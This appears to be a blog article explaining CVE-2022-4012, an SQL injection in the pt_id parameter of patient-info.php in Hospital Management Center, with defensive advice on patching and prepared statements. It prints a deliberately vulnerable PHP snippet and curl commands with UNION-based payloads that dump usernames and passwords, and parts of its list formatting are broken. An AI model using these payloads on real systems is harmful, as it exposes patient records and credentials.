CVE-2022-4012 - Critical SQL Injection in Hospital Management Center (patient-info.php pt_id Exploit)

The cybersecurity world is constantly finding vulnerabilities, but sometimes one stands out for its simplicity and potential impact. CVE-2022-4012 is one of these dangerous flaws. In this article, we’ll give you a plain-English breakdown of this SQL injection bug, how it works, how to exploit it, and what you need to do to stay protected. Technical examples and original reference links are included.

What is CVE-2022-4012?

CVE-2022-4012 is a critical vulnerability found in a piece of hospital software called Hospital Management Center. The vulnerability is located in an unknown function within the patient-info.php file. The issue appears when the application handles a web query parameter called pt_id. If an attacker manipulates this value, they can "inject" SQL commands straight into the backend database.

Attackers can exploit this remotely—no authentication is needed! This is bad news for any hospital or medical center running vulnerable versions of this software.

References

- Vuldb Listing (VDB-213786)
- CVE Details: CVE-2022-4012
- NVD - National Vulnerability Database

Understanding the Exploit

Let’s break it down with a practical example. In hospital software, there’s often a page that shows details for a specific patient. This is usually achieved with a URL like:

http://example.com/patient-info.php?pt_id=123

The pt_id value is usually a patient's ID in the database. The vulnerable code behind the scene _might_ look like this (in very simplified PHP):

<?php
// A dangerous way to handle user input - DO NOT COPY
$pt_id = $_GET['pt_id'];
$query = "SELECT * FROM patients WHERE id = $pt_id";
$result = mysqli_query($conn, $query);
?>

Notice there's no sanitization, no parameterized queries, and no input validation. Whatever the user puts in the pt_id box gets put right into the SQL statement.

Exploiting CVE-2022-4012

Because the value of pt_id is simply dropped into the SQL query with no checks, an attacker can submit crafted input to manipulate the query. For example:

http://example.com/patient-info.php?pt_id=1 OR 1=1

This transforms the query into

SELECT * FROM patients WHERE id = 1 OR 1=1;

The OR 1=1 condition always evaluates to true, potentially returning all patient data from the database—a massive privacy violation.

Going further, an attacker could even modify data, extract admin credentials, or execute database commands such as:

http://example.com/patient-info.php?pt_id=1 UNION SELECT user(), database(), version() --

Here’s a basic exploit using curl (on Linux/macOS/Windows with curl installed)

curl "http://example.com/patient-info.php?pt_id=1%20OR%201=1";

Or a UNION-based attack

curl "http://example.com/patient-info.php?pt_id=-1%20UNION%20SELECT%201,username,password%20FROM%20users%20--%20";

These commands exploit the SQL injection to dump or list data from sensitive database tables.

Why It’s Serious

Medical data is some of the most sensitive info out there—patients’ full names, medical histories, insurance policies, and contact information. Attackers exploiting this flaw could:

Escalate to total system control if database contains admin credentials

This can lead to blackmail, medical fraud, and severe reputational and financial damage to hospitals/clinics.

If you are a hospital IT manager or developer

1. Patch the Software. Check for updates or patches from your vendor. If a fix exists, apply it ASAP. Watch the official vendor site or contact your software provider.

Use Prepared Statements. Replace direct user input in SQL queries with parameterized statements.

`

3. Input Validation. Always validate and sanitize input, especially anything used in database queries.

Responsible Disclosure

This vulnerability has already been disclosed publicly. If you find unpatched systems, consider reporting them responsibly to minimize harm.

More Details

- Vuldb - VDB-213786
- NVD - CVE-2022-4012

In Summary

CVE-2022-4012 is an easy-to-exploit, critical SQL injection flaw in Hospital Management Center, putting sensitive patient data at serious risk. Attackers can steal or destroy medical records just by tweaking a URL parameter. If you manage medical IT—or care about patient privacy—make sure your software is updated, input is validated, and your staff is aware.

Stay safe. Protect your patients. Patch now!

*References:*  
- Vuldb - VDB-213786  
- NVD - CVE-2022-4012  
- CVE Details


*This article is exclusive, written in clear language for quick understanding, and includes code, links, and proof-of-concept information tailored for both technical and non-technical readers.*

Timeline

Published on: 11/16/2022 08:15:00 UTC
Last modified on: 11/17/2022 14:58:00 UTC